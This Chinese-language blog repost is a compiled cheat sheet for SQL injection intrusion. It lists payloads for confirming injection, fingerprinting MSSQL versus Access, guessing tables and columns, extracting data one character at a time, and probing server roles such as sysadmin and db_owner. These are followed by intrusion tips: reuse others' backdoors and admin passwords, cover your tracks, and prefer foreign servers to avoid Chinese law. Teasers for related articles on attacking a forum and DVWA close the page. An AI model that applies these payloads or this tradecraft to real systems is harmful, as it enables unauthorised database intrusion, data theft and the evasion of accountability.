SQL入侵注入的完全總結詳解(網上蒐集的,)

2021-08-07 16:12:04 字數 1743 閱讀 9998

一、方法總結:

1.判斷是否有注入

and 1=1

and 1=2

2.初步判斷是否是mssql

and user>0

3.判斷資料庫系統

and (select count(*) from sysobjects)>0   mssql

and (select count(*) from msysobjects)>0  access 

4.注入引數是字元

and [查詢條件] and 」=』

5.搜尋時沒過濾引數的

and [查詢條件] and 『%25′=』

6.猜資料庫

and (select count(*) from [資料庫名])>0 

7.猜欄位

and (select count(欄位名) from 資料庫名)>0

8.猜字段中記錄長度

and (select top 1 len(欄位名) from 資料庫名)>0

9.(1)猜字段的ascii值(access)

and (select top 1 asc(mid(欄位名,1,1)) from 資料庫名)>0

(2)猜字段的ascii值(mssql)

and (select top 1 unicode(substring(欄位名,1,1)) from 資料庫名)>0

10.測試許可權結構(mssql)

and 1=(select is_srvrolemember(『sysadmin』));–

and 1=(select is_srvrolemember(『serveradmin』));–

and 1=(select is_srvrolemember(『setupadmin』));–

and 1=(select is_srvrolemember(『securityadmin』));–

and 1=(select is_srvrolemember(『diskadmin』));–

and 1=(select is_srvrolemember(『bulkadmin』));–

and 1=(select is_member(『db_owner』));–

11.mssql內建函式

and (select @@version)>0   獲得windows的版本號

and user_name()=』dbo』     判斷當前系統的連線使用者是不是sa

and (select user_name())>0  爆當前系統的連線使用者

and (select db_name())>0   得到當前連線的資料庫

二、思路總結:

1.刺探環境  2.找到注入點

如果是acc,老老實實的猜解表名,欄位名,然後找後台或者另尋它路

如果是sql的,許可權一般許可權,按照acc的方法走

如果許可權是db,首先考慮備份,不成功再走通用法

如果是sa的就不說了,方法太多了

社會工程學(技巧):

2.列目錄找後台

4.sql的可執行相關命令暴出很多資訊

5.入侵中,用心記每乙個出現的細節,對以後可能有幫助   ,如果有可能,盡好記下,筆記本和記事本無所謂

7.記住最好的後門是用別人的後門,最好的密碼最好用管理員的密碼

8.最後說一點,入侵最好不要掛黑頁,進伺服器後記得登出後退出,不要忘記搓屁股(這點不要學原部落格主,因為原部落格主進的大多數是國外的伺服器,就算查到也關係不大,中國的法律不是開玩笑的)

運氣+時間+技術+經驗=入侵成功

SQL注入入侵動網SQL版論壇

現在動網最新版本是7.0 sp2。應該說安全性已經是很高的了。所以從指令碼本身的問題去突破它難 度不小。但是我們可以從外部的一些途徑間接 搞定 動網.現在iis asp sql2000的組合是比較常見的。而乙個 運用大量的asp指令碼程式,難免不出紕漏。如果一台主機上存在某個sql注入點,而這台主機...

再談SQL注入入侵動網SQL版論壇

現在動網最新版本是7.0 sp2。應該說安全性已經是很高的了。所以從指令碼本身的問題去突破它難度不小。但是我們可以從外部的一些途徑間接 搞定 動網.現在iis asp sql2000的組合是比較常見的。而乙個 運用大量的asp指令碼程式,難免不出紕漏。如果一台主機上存在某個sql注入點,而這台主機又...

DVWA的入侵SQL注入

前言 在攻擊開始前,我們至少要具備操作mysql的一些簡單語句,否則可能此文章對閱讀者的你存在困難,有朋友問這都什麼年代了還會存在sql注入?其實做這個的時候是因為昨天我編寫 的時候寫出了乙個sql注入並且在上線的時候被朋友挖掘了出來,漏洞圖如下,就因為我的一次邏輯判斷錯誤而導致,所以今天想起了寫一...